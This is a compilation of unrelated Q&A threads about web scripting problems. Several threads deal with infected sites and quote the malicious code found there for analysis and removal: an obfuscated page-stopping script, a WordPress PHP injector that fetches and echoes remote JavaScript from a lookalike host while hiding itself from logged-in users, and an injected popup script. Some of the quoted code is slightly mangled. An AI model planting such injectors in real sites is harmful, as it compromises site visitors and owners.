I got a call from a friend who has a large shopping cart web site. After a while a page would not load and you had to do a page refresh to show the page.
I'm not a html guy but can fumble around and understand the basics.
I started with firebug and found they were calling a chat service that was failing. I then checked all the web pages that had been altered since the setup of the site and deleted the chat script.
However on the same page I found the following script:
var _0x3fba = [
"\x72\x61\x6E\x64\x6F\x6D",
"\x66\x6C\x6F\x6F\x72",
"\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E",
"\x77\x72\x69\x74\x65",
"\x73\x74\x6F\x70"
];
if ( Math[ _0x3fba[1] ]( ( Math[ _0x3fba[0] ]() * 3 ) + 1 ) == 3 ) {
document[ _0x3fba[3] ]( _0x3fba[2] );
window[ _0x3fba[4] ]();
};
After some googling I am led to believe this is Obfuscated javascript. We held our breath (it's a large site with lots of traffic) and deleted the above script and the problem went away and the site runs a lot faster.
So the million dollar question is what is this script actually doing.
I tried some online deObfuscaters but got nothing.
if (Math.floor((Math.random() * 3) + 1) == 3) {
document.write('<script type="text/undefined">');
window.stop();
}
not very interesting really.
If you execute:
["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E","\x77\x72\x69\x74\x65","\x73\x74\x6F\x70"];
You'll get
["random", "floor", "<script type="text/undefined">", "write", "stop"]
so the code do:
if (Math["floor"]((Math["random"]()*3)+1)==3) {
document["write"]('<script type="text/undefined">');
window["stop"]();
}
The code, print <script type="text/undefined"> randomly and stop loading the page, maybe it try to crash the page randomly.
Related
I am new to Javascript and am trying to make an outlook web-addin take the Office.onReady() function properly.
https://learn.microsoft.com/en-us/office/dev/add-ins/develop/initialize-add-in
I tried using
Office.onReady()
.then
to make my function work with the office js API but it then I got an error that my function couldn't be found.
Code:
$("#brief-summary").click(briefsummary);
$("#email-setup").click(emailsetup);
Office.onReady()
.then(function briefsummary() {
var msgFrom = Office.context.mailbox.item.from;
var msgfirstname = String(msgFrom.displayName).split(" ");
Office.context.mailbox.item.displayReplyAllFormAsync(
"Hello " +
msgfirstname[0] +
", <br> \
<br> Here is a brief summary on everything worked on: \
<br> \
<br>Thank you for your time, \
<br>"
);
});
Result:
Uncaught ReferenceError: briefsummary is not defined
So I am pretty sure I am doing it wrong.
I also tried using Office.onReady(); at the begining of the script. It suppressed the Uncaught Error: Office.js has not fully loaded. Your app must call "Office.onReady()" error but office javascript doesn't do anything. (Its suppose to bring up a new reply window with text inside)
Link to where the app is hosted: https://alloyautomateaddinbeta3.azurewebsites.net/index.html (Although the office.js only loads when you are in the outlook app. But you can go to sources from inspector in chrome and look at the js script in full)
Any ideas would be awesome.
I have seems to figure out what to do but I was pretty janky. If anyone knowas a better way to clean this up let me know.
I essentially my code inbetween this and it worked:
Office.onReady((info) => {
if (info.host === Office.HostType.Outlook) {
#Insert code here
}
});
It was pretty janky as it gives me a warning saying Function variables should not be placed in blocks. Use a function expression or move the statement to the top of the outer function
I will be working on the code periodically so I will update my answer to a better one as time goes on unless someone else has an answer as well.
Thanks
One of my company's client's website is infected with a malware. In the source there is a <script src="http://www.10wp.org/jquery.js"></script> that is printed randomly.
I following this article and searching the code. But so far I could find where the malicious script is inserted.
Did any of you have the same issue? Where did you find the malicious script?
You need to nuke the system from orbit. There is no way for us to know where that code is being injected into your server output, and there is no way for you to ever know that the system isn't still compromised.
You need to stand up a new server, patch it so that it is not reinfected, and load your application code from backup. That is the only way you can be sure you've resolved the problem.
the mallware inserts a piece of code in a random place of your site. After many hours of testing and searching i found this one.
if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'lib'.'wp.org/jquery-ui.js';
$headers = #get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
function wp_func_min(){
setcookie('wp_min', '1', time() + (86400 * 360), '/');
}
add_action('wp_login', 'wp_func_min');
}
look for wp_func_jquery or lib'.'wp.org
the inserted jquery should be empty when you open it in browser, it deploys its payload under other circumstances.
Hope it helps
This is a really strange one. Our company has has an InDesign script that, near the end, calls Acrobat (by way of Applescript) to open a PDF file, replace a page in it, then save the file and close it. We've been using this script for over a year and a half now with no issues on 8 of the 9 computers we have. That last one, however, is giving me an odd message when it tries to open and save the file.
To be clear, all 9 computers are Macs, all running OS X 10.9.5 Mavericks. The script is on a central server, so they're all using the same file:
var unlockCover2014 = app.trustedFunction(function (fName, fPrefix)
{
app.beginPriv();
var folderPrefix = fName.match(/^.*?(?=JOBS)/);
console.println("fName is " + fName);
console.println("folderPrefix is " + folderPrefix);
var myDoc = app.openDoc(folderPrefix + "Product Templates/ProofCoverNew/proof_cover_2014.pdf");
myDoc.replacePages(0, fName, 0, 0);
myDoc.saveAs(fName);
myDoc.closeDoc(true);
app.endPriv();
});
This file is stored in the correct folder to be a Folder-level script. 8 of the computers work through this without any trouble whatsoever. The 9th, however, puts this into Acrobat's Javascript console:
fName is /ArtDept/ArtDept/JOBS/425000-425999/425000 Folder/425000_cover.pdf
folderPrefix is /ArtDept/ArtDept/
RaiseError: This file is already open.
Doc.saveAs:9:
===> This file is already open.
I do not understand why this computer, alone, thinks that the PDF files are open already. The problem that arises from this is that, when the main InDesign script is done running, two documents are still open in Acrobat, and the one it's supposed to save does not get saved.
Any ideas about what's going on here?
I did finally discover what the problem was. I feel a bit silly about how (almost) obvious it is, but perhaps it might help others in my situation.
I disabled the line in the main InDesign script that was calling Acrobat, figuring I'd come back to that problem later after I dealt with some other issues. When I did so and ran the main script again, I discovered that Acrobat does, in fact, already open up a copy of that cover sheet PDF sometime during the execution of the main script! I was shocked, at first, but then I did a headdesk when I quickly realized the cause:
InDesign on this computer is set, by default, to automatically open a PDF after exporting it.
So, I just added a short line to the part of my code that sets the PDF Export Preferences to turn that feature off:
with (app.pdfExportPreferences)
{
pageRange = proofRange;
if (multiColor) pageRange = colorTable.toString();
useSecurity = true;
disallowChanging = true;
disallowCopying = false;
disallowDocumentAssembly = true;
disallowExtractionForAccessibility = false;
disallowFormFillIn = true;
disallowHiResPrinting = false;
disallowNotes = true;
disallowPlaintextMetadata = true;
disallowPrinting = false;
changeSecurityPassword = "(NOPE)";
viewPDF = false;
}
It's the viewPDF line at the end. (Sorry, I don't think I can highlight it with markdown.) I do feel silly that I overlooked such a semi-obvious cause, but I hope this might help someone else who is experiencing a similar issue. Thanks for trying to help anyway, #Loic.
Is it possible that the Acrobat script is ran while InDesign has not totally ended writing the PDF File if this is what we are talking about ? Or maybe there are some network latencies that make the file not reachable for the moment.
I would advice using a delay to (in)validate that theory.
delay 3
On another end, why do you need to replace file. I mean can't this be thought in InDesign Scripting Scope only ? Just curious.
My site was probably hacked. I am finding script.js from bigcatsolutions.com in my page. It triggers a popup of an affiliate program. The script isn't on the page by default and I want to know how can I find where it was injected. The script sometimes injects other ad sites.
In chrome I see this:
The injected script code:
function addEvent(obj, eventName, func) {
if (obj.attachEvent) {
obj.attachEvent("on" + eventName, func);
} else if (obj.addEventListener) {
obj.addEventListener(eventName, func, true);
} else {
obj["on" + eventName] = func;
}
}
addEvent(window, "load", function (e) {
addEvent(document.body, "click", function (e) {
if (document.cookie.indexOf("booknow") == -1) {
params = 'width=800';
params += ', height=600';
params += ', top=50, left=50,scrollbars=yes';
var w = window.open("http://booknowhalong.com/discount-news", 'window', params).blur();
document.cookie = "booknow";
window.focus();
}
});
})
My site is moved from my hosting company to Amazon EC2 Windows 2013 Server and still have the issues, so it means that the code still resides on the server somewhere. My site was build using ASP.ENT / C#.
Things I did:
tried to search the original aspx and aspx.cs code files
Have you checked the IIS logs to see if they are hitting a specific page and injecting it there?
Do you load any data from a database? You could check in the tables and see if anything out of the ordinary appears there.
It is unlikely that the .aspx pages have actually been physically modified and even more unlikely that the DLL have been as .aspx.cs files are compiled in to your BIN folder as DLL's. The more likely scenario is that you have an unsecure page that a malicious site is injecting its script into. The other possible attack vector is that you have had malicious code via SQL injection and are loading it each time.
After deep searching and I missed it in the first run, I found that the script was injected into the ASP.NET masterpage.
I ran a search to search for a specific string in all the files and that's how I found it. It seems that the server itself was breached and the hacker put the code into several websites.
So for those of you who have this type of problem, I recommend running a text search and try to find the URL that is tights to the running script.
Hope that helps and thanks for your time.
I'm in need of some help.
I'm building a team bio page it keeps crashing IE8 when I call jQuery plugins.
I'm not sure what is going on and can't even run the IE debugger because it crashes so hard.
Any IE8 / jQuery experts out there willing to take a look and offer some help?
Here is the main team page. Clicking through to any of the links causes the crash in IE8.
I am using:
jQuery Tagsphere, AnythingSlider, and jQuery Cycle.
Thanks in advance for any insight into this.
I had a similar problem, most notably closing iframes with IE8. Stumbled across the following code in jquery-1.6.2, which was intended to solve problems with document.domain. Some comments on the web lead me to believe this was a recent problem. Dropped back to jquery-1.4.4 and the problem was resolved.
CODE SEGMENT FROM JQUERY-1.6.2 FOLLOWS:
// #8138, IE may throw an exception when accessing
// a field from window.location if document.domain has been set
try {
ajaxLocation = location.href;
} catch( e ) {
// Use the href attribute of an A element
// since IE will modify it given document.location
ajaxLocation = document.createElement( "a" );
ajaxLocation.href = "";
ajaxLocation = ajaxLocation.href;
}